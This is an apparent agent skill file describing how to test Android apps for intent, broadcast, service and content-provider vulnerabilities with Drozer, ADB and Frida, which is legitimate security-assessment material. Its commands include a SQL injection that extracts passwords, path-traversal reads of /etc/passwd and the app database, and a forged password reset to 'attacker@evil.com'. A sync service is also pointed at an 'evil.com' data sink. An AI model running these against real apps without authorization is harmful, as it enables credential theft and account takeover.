| name | testing-android-intents-for-vulnerabilities |
| description | Tests Android inter-process communication (IPC) through intents for vulnerabilities including intent injection, unauthorized component access, broadcast sniffing, pending intent hijacking, and content provider data leakage. Use when assessing Android app attack surface through exported components, testing intent-based data flows, or evaluating IPC security. Activates for requests involving Android intent security, IPC testing, exported component analysis, or Drozer assessment.
|
| domain | cybersecurity |
| subdomain | mobile-security |
| author | mahipal |
| tags | ["mobile-security","android","intents","ipc-security","owasp-mobile","penetration-testing"] |
| version | 1.0.0 |
| license | Apache-2.0 |
| nist_csf | ["PR.PS-01","PR.AA-05","ID.RA-01","DE.CM-09"] |
| mitre_attack | ["T1059","T1056","T1036","T1078","T1055"] |
Testing Android Intents for Vulnerabilities
When to Use
Use this skill when:
- Assessing Android app exported activities, services, receivers, and content providers
- Testing for intent injection and unauthorized component invocation
- Evaluating broadcast receiver security for sensitive data exposure
- Performing IPC-focused penetration testing on Android applications
Do not use on production devices without explicit authorization.
Prerequisites
- Rooted Android device or emulator with ADB
- Drozer agent installed on target device (
drozer agent.apk)
- Drozer console on host (
pip install drozer)
- Target APK decompiled with apktool for AndroidManifest.xml analysis
- Frida for runtime intent monitoring
Workflow
Step 1: Enumerate Exported Components
drozer console connect
run app.package.info -a com.target.app
run app.package.attacksurface com.target.app
run app.activity.info -a com.target.app
run app.service.info -a com.target.app
run app.broadcast.info -a com.target.app
run app.provider.info -a com.target.app
Step 2: Test Exported Activities
run app.activity.start --component com.target.app com.target.app.AdminActivity
run app.activity.start --component com.target.app com.target.app.ProfileActivity \
--extra string user_id 1337
adb shell am start -a android.intent.action.VIEW \
-d "content://com.target.app/users/admin" com.target.app
Step 3: Test Broadcast Receivers
run app.broadcast.send --action com.target.app.PROCESS_PAYMENT \
--extra string amount "0.01" --extra string recipient "attacker"
run app.broadcast.sniff --action com.target.app.USER_LOGIN
adb shell am broadcast -a com.target.app.RESET_PASSWORD \
--es email "attacker@evil.com"
Step 4: Test Content Providers
run app.provider.query content://com.target.app.provider/users
run app.provider.query content://com.target.app.provider/users --projection "password"
run app.provider.query content://com.target.app.provider/users \
--selection "1=1) UNION SELECT username,password FROM users--"
run app.provider.read content://com.target.app.provider/../../etc/passwd
run app.provider.download content://com.target.app.provider/../databases/app.db /tmp/stolen.db
run scanner.provider.injection -a com.target.app
run scanner.provider.traversal -a com.target.app
Step 5: Test Pending Intent Vulnerabilities
Java.perform(function() {
var PendingIntent = Java.use("android.app.PendingIntent");
PendingIntent.getActivity.overload("android.content.Context", "int",
"android.content.Intent", "int").implementation =
function(context, requestCode, intent, flags) {
console.log("[PendingIntent] getActivity:");
console.log(" Intent: " + intent.toString());
console.log(" Flags: " + flags);
var FLAG_MUTABLE = 0x02000000;
if ((flags & FLAG_MUTABLE) !== 0) {
console.log(" [VULN] FLAG_MUTABLE - PendingIntent can be modified by receiver");
}
return this.getActivity(context, requestCode, intent, flags);
};
});
Step 6: Test Service Binding
run app.service.start --action com.target.app.SYNC_SERVICE \
--extra string server "https://evil.com/data_sink"
run app.service.send com.target.app com.target.app.MessengerService \
--msg 1 0 0 --extra string command "dump_database" --bundle-as-obj
Key Concepts
| Term | Definition |
|---|
| Exported Component | Android component (activity/service/receiver/provider) accessible to other apps on the device |
| Intent | Messaging object for requesting actions from other components; can be explicit (target specified) or implicit (action-based) |
| Pending Intent | Token wrapping an intent for future execution by another app; mutable PendingIntents can be modified by recipients |
| Content Provider | Component for structured data sharing between apps; SQL injection target if query parameters are not sanitized |
| Broadcast Receiver | Component receiving system or app broadcasts; exported receivers can be triggered by any app |
Tools & Systems
- Drozer: Android security assessment framework for IPC testing with pre-built modules
- ADB: Command-line tool for invoking intents, starting activities, and sending broadcasts
- Frida: Runtime monitoring of intent handling and PendingIntent creation
- apktool: APK decompilation for AndroidManifest.xml analysis of component export status
- Intent Fuzzer: Automated tool for fuzzing intent parameters across exported components
Common Pitfalls
- android:exported default changed in API 31: Components with intent filters default to exported=true below API 31 but exported=false at API 31+. Check targetSdkVersion.
- Permission-protected components: An exported component may still require a permission. Test with and without the required permission.
- Implicit intents vs explicit: Only implicit intents (action-based) are interceptable by other apps. Explicit intents (specifying target) are secure.
- Custom permissions: Apps can define custom permissions with different protection levels (normal, dangerous, signature). Signature-level permissions are only grantable to apps signed with the same certificate.